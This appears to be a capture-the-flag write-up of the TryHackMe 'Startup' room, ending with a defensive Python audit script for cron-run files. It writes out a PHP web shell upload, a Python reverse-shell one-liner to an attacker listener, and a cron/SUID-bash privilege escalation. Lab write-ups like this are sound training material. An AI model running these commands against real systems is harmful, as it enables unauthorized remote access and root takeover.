Startup-TryHackme



This is a write-up for the TryHackMe room named Startup.
The room can be found here: https://tryhackme.com/room/startup


Initial Access
===========
# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.195.72

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.195.72

FTP allows anonymous login.
The ftp folder is writable.
Uploaded a PHP web shell from
    - https://github.com/artyuum/Simple-PHP-Web-Shell
Execute this through the web shell to get a reverse shell (10.8.98.192:9999 is the attacking machine's listener):
    - python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.98.192",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Upgrade the shell to a proper TTY:
    - python -c "import pty;pty.spawn('/bin/bash')"

What is the secret spicy soup recipe?
============================
$ cat /recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was ****.

User.txt
=======
Navigating through the file system, I found /incidents/suspicious.pcapng.
Ran a Python web server on the target to get the packet capture onto the attacking machine:
- python -m SimpleHTTPServer 8080
Ran this command on the attacking machine to fetch the file:
- wget http://10.10.195.72:8080/suspicious.pcapng

Analyzing the file in Wireshark reveals a password:



Let's try the password found above for user lennie: run su lennie and enter the password.
Success, and we get user.txt at /home/lennie.

Root.txt
=======
In user lennie's home directory, check the folder named scripts:
lennie@startup:~/scripts$ ls -lrt
ls -lrt
total 8
-rwxr-xr-x 1 root root 77 Nov 12 04:53 planner.sh
-rw-r--r-- 1 root root 1 Nov 19 18:54 startup_list.txt

planner.sh looks like a script run via a cron job:
lennie@startup:~/scripts$ cat planner.sh
cat planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh

As we can see, /home/lennie/scripts/startup_list.txt is being updated every minute, so the cron job runs as root every minute.

Also, /etc/print.sh, which planner.sh executes, is owned by user lennie, so lennie can decide what root runs.

Append the following to /etc/print.sh:
lennie@startup:~/scripts$ echo "cp /bin/bash /tmp; chmod +s /tmp/bash" >> /etc/print.sh

After one minute we get this in /tmp:
-rwsr-sr-x 1 root root 1037528 Nov 19 19:03 bash

Now run this SUID bash to get root and read the root flag at /root/root.txt:
/tmp/bash -p
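The root cause of this privilege escalation is a root cron job executing a file that an unprivileged user owns. The following audit script is an added example (not part of the original write-up): it scans a cron-run script for absolute paths and reports any existing file that is not root-owned or is group/world-writable. The planner.sh text and the uid 1000 for lennie are a constructed fixture mirroring the room; on a live host pass the script contents with the default os.stat.

```python
import os
import re
import stat
from collections import namedtuple

# Absolute paths in a shell script, e.g. "/etc/print.sh" or a redirection target
PATH_RE = re.compile(r"(?<![\w/])(/[\w./-]+)")

def referenced_paths(script_text):
    """Absolute paths the script mentions, comments and shebang stripped, in order."""
    found = []
    for line in script_text.splitlines():
        found += PATH_RE.findall(line.split("#", 1)[0])
    return list(dict.fromkeys(found))

def weak_permissions(st):
    """Reasons root should not execute or write this file unchecked."""
    checks = [(st.st_uid != 0, "not owned by root (uid %d)" % st.st_uid),
              (st.st_mode & stat.S_IWGRP, "group-writable"),
              (st.st_mode & stat.S_IWOTH, "world-writable")]
    return [why for bad, why in checks if bad]

def audit_cron_script(script_text, stat_fn=os.stat):
    """Map each existing referenced path to its problems; a clean script gives {}."""
    findings = {}
    for path in referenced_paths(script_text):
        try:
            st = stat_fn(path)
        except FileNotFoundError:
            continue  # e.g. an output file the script creates later
        problems = weak_permissions(st)
        if problems:
            findings[path] = problems
    return findings

# Constructed fixture: planner.sh as listed above, /etc/print.sh owned by uid 1000 (lennie)
PLANNER_SH = "#!/bin/bash\necho $LIST > /home/lennie/scripts/startup_list.txt\n/etc/print.sh\n"
FakeStat = namedtuple("FakeStat", "st_uid st_mode")
FAKE_FS = {
    "/home/lennie/scripts/startup_list.txt": FakeStat(0, 0o100644),
    "/etc/print.sh": FakeStat(1000, 0o100755),
}

def fake_stat(path):  # stand-in for os.stat over the constructed filesystem
    if path not in FAKE_FS:
        raise FileNotFoundError(path)
    return FAKE_FS[path]

if __name__ == "__main__":
    print(audit_cron_script(PLANNER_SH, fake_stat))
```

Run against the fixture it reports only /etc/print.sh; the root-owned, non-writable startup_list.txt passes.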

This room was easy, but it exposes us to Wireshark analysis and a cron-based technique for privilege escalation.

